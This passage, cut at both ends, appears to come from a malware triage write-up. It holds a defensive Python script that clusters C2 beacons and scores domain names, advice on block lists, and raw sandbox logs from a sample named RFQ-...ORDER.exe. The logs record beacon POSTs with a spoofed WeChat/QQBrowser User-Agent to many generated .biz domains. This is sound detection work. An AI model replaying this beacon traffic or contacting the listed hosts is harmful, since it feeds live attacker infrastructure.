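            continue                               # 1.1.1.1:53 is the resolver, not C2
        fam = next((f for kw, f in FAMILIES if kw in low), "other")
        (sinkholed if fam == "sinkhole" else live[fam]).add(remote)
    for fam in live:
        live[fam] -= sinkholed
    return dict(live), sinkholed, domains


# HTTP requests copied from this report, which prints the headers run together
# on one line; the shared User-Agent is factored out only for readability.
UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
      "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")
HDRS = "Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cache"
POSTS = [("/g", "pywolwnvd.biz", 778), ("/fuutkfqprp", "pywolwnvd.biz", 850),
         ("/cpfjcmisuekk", "ssbzmoy.biz", 778), ("/bkii", "cvgrf.biz", 778),
         ("/jejtv", "npukfztj.biz", 778), ("/vi", "przvgke.biz", 778)]
HTTP_LINES = [f"POST {p} HTTP/1.1{HDRS}Host: {h}User-Agent: {UA}Content-Length: {n}"
              for p, h, n in POSTS]
HTTP_LINES.append(f"GET /vi?usid=25&utid=9811636311 HTTP/1.1{HDRS}User-Agent: {UA}Host: ww12.przvgke.biz")

NEXT_HDR = r"(?=Cache-Control:|Connection:|Pragma:|Host:|User-Agent:|Content-Length:|\s*\||$)"
REQ_RE = re.compile(r"(?P<method>GET|POST) (?P<path>\S+) HTTP/1\.[01]")
HOST_RE = re.compile(r"Host: (?P<host>[A-Za-z0-9.\-]+?)" + NEXT_HDR)
UA_RE = re.compile(r"User-Agent: (?P<ua>.+?)" + NEXT_HDR)
CL_RE = re.compile(r"Content-Length: (?P<cl>\d+)")


def parse_http(line):
    """Method, path, Host, User-Agent, Content-Length from one request line; works on
    the run-together form above and on headers separated by ' | '."""
    m = REQ_RE.search(line)
    if not m:
        return None
    h, u, c = HOST_RE.search(line), UA_RE.search(line), CL_RE.search(line)
    return {"method": m["method"], "path": m["path"], "host": h["host"] if h else "",
            "ua": u["ua"] if u else "", "length": int(c["cl"]) if c else None}


def cluster_beacons(requests, min_hosts=3):
    """Group POSTs by (User-Agent, Content-Length). One client string sending
    same-sized bodies to many distinct domains is the beacon fingerprint; unlike
    per-domain scoring it survives the domain rotation seen in this report."""
    groups = defaultdict(set)
    for r in requests:
        if r["method"] == "POST" and r["length"] is not None:
            groups[(r["ua"], r["length"])].add(r["host"])
    return {k: sorted(v) for k, v in groups.items() if len(v) >= min_hosts}


ENGLISH_PCT = dict(a=8.2, b=1.5, c=2.8, d=4.3, e=12.7, f=2.2, g=2.0, h=6.1, i=7.0, j=0.15,
                   k=0.77, l=4.0, m=2.4, n=6.7, o=7.5, p=1.9, q=0.095, r=6.0, s=6.3,
                   t=9.1, u=2.8, v=0.98, w=2.4, x=0.15, y=2.0, z=0.074)


def letter_surprisal(label):
    """Mean -ln p(letter) under English unigram frequencies; higher is less English-like.
    This is the letter-frequency check the report cites. It is weak on short labels
    (deoci, ifsaia read as plausible words), so treat it as supporting evidence only."""
    letters = [ch for ch in label.lower() if ch in ENGLISH_PCT]
    if not letters:
        return 0.0
    return sum(-math.log(ENGLISH_PCT[ch] / 100) for ch in letters) / len(letters)


if __name__ == "__main__":
    live, sinkholed, domains = triage_alerts(ALERT_LINES)
    print("live C2:", live, "\nsinkholed:", sinkholed, "\nbeacon domains:", domains)
    reqs = [r for r in map(parse_http, HTTP_LINES) if r]
    for (ua, n), hosts in cluster_beacons(reqs).items():
        print(f"beacon fingerprint: UA ...{ua[-28:]} body={n} -> {len(hosts)} hosts {hosts}")
    for host in sorted({r["host"] for r in reqs}):
        print(f"{host:18} surprisal={letter_surprisal(host.split('.')[-2]):.2f}")
```

The practical output is two separate block lists: the live endpoints go to the firewall and to the IOC report, while the sinkholed endpoints go to the proxy deny list only, because listing a sinkhole IP as attacker infrastructure misleads anyone who reuses the report. For hunting in proxy logs the (User-Agent, Content-Length) pair is the durable signal; the fake WeChat/QQBrowser client string combined with small fixed-size POSTs to never-before-seen .biz hosts is far more specific than any score on the domain label alone.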
Source: global traffic HTTP traffic detected: POST /g HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fuutkfqprp HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 850
Source: global traffic HTTP traffic detected: POST /cpfjcmisuekk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ssbzmoy.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /bkii HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: cvgrf.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jejtv HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: npukfztj.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vi HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: GET /vi?usid=25&utid=9811636311 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Host: ww12.przvgke.biz
Source: global traffic HTTP traffic detected: POST /kcj HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: knjghuig.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /c HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 848
Source: global traffic HTTP traffic detected: POST /vffaaftj HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ssbzmoy.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 848
Source: global traffic HTTP traffic detected: POST /qshyvlcbk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: xlfhhhm.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ytgnoen HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ifsaia.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /yuftm HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: saytjshyf.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vbty HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: vcddkls.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /poihsqpaasbgdl HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: fwiwk.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: GET /poihsqpaasbgdl?usid=25&utid=9811652355 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Host: ww12.fwiwk.biz
Source: global traffic HTTP traffic detected: POST /qddngkni HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: tbjrpv.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fkqpqfhdsudwov HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: deoci.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /garcaqlmbvibrae HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: gytujflc.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /yxfxsqq HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: gytujflc.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jhmncdsktepa HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: qaynky.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mdggmdcnbmek HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: bumxkqgxu.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /veg HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: dwrqljrr.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /iegvnj HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: nqwjmb.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /wifbvlyjhbbms HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ytctnunms.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xkjclmaphxfk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: myups.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nehgmgtqoyslwd HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: myups.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mdsdns HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: oshhkdluh.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rexfjdt HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: yunalwv.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ryotcjv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nwopgtruvkd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /awknmdgilg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /sidemxclaeqjek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /clgt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lbvkwwnpmntaxcl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /iaqpbajpgrrgeab HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dpptvlnf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kfrhjclimdoqr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /oefmmmgpghmo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /walyoyypsnq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ihvmkpdsn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /wy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_004722EE
Source: global traffic HTTP traffic detected: GET /vi?usid=25&utid=9811636311 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic HTTP traffic detected: GET /poihsqpaasbgdl?usid=25&utid=9811652355 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
Source: global traffic DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic DNS traffic detected: DNS query: przvgke.biz
Source: global traffic DNS traffic detected: DNS query: ww12.przvgke.biz
Source: global traffic DNS traffic detected: DNS query: zlenh.biz
Source: global traffic DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic DNS traffic detected: DNS query: ww12.fwiwk.biz
Source: global traffic DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic DNS traffic detected: DNS query: deoci.biz
Source: global traffic DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic DNS traffic detected: DNS query: qaynky.biz
Source: global traffic DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic DNS traffic detected: DNS query: myups.biz
Source: global traffic DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic DNS traffic detected: DNS query: jpskm.biz
Source: global traffic DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic DNS traffic detected: DNS query: vyome.biz
Source: global traffic DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic DNS traffic detected: DNS query: typgfhb.biz
Source: unknown HTTP traffic detected: POST /g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 25 Mar 2025 17:22:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 